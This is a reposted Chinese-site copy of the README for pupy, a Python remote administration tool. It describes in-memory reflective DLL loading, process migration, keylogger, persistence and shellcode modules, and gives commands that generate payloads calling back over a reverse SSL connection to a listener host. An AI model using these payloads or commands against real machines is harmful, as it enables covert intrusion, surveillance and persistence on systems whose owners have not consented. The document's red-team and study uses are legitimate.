Python 遠程管理工具:pupy

jopen 9年前發布 | 13K 次閱讀 pupy Python開發

Pupy是一個遠程管理工具,擁有內嵌的Python解釋器,允許其模塊從內存中加載Python包,透明地訪問遠程Python對象。Pupy使用反射的DLL和不會在磁盤上留下任何痕跡。

Features :

  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)

  • Pupy can reflectively migrate into other processes

  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).

  • modules are quite simple to write and pupy is easily extensible.

  • Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client

    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
      • </ul> </li>

    • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future

    • all the non interactive modules can be dispatched on multiple hosts in one command

    • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)

    • modules can be executed as background jobs

    • commands and scripts running on remote hosts are interruptible

    • auto-completion and nice colored output :-)

    • commands aliases can be defined in the config
      • </ul>

      Implemented Modules :

      • migrate (windows only)

        • inter process architecture injection also works (x86->x64 and x64->x86)
          • </ul> </li>

        • keylogger (windows only)

        • persistence (windows only)

        • screenshot (windows only)

        • command execution

        • download

        • upload

        • socks5 proxy

        • interactive shell (cmd.exe, /bin/sh, ...)

        • interactive python shell

        • shellcode exec (thanks to @byt3bl33d3r)
          • </ul>

          Quick start

          In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
          The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

          generate/run a payload

          for Windows 

          ./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

          you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

          for Linux 

          pip install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443

          for MAC OS X 

          easy_install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443

          start the server

          1. eventually edit pupy.conf to change the bind address / port
          2. start the pupy server : 
          ./pupysh.py

          Some screenshots

          list connected clients

          screenshot1

          help

          screenshot3

          execute python code on all clients

          screenshot2

          execute a command on all clients, exception is retrieved in case the command does not exists

          screenshot4

          use a filter to send a module only on selected clients

          screenshot5

          migrate into another process

          screenshot6

          interactive shell

          screenshot7

          interactive python shell

          screenshot8

          項目主頁:http://www.baiduhome.net/lib/view/home/1443084003685

 本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
 轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
 本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!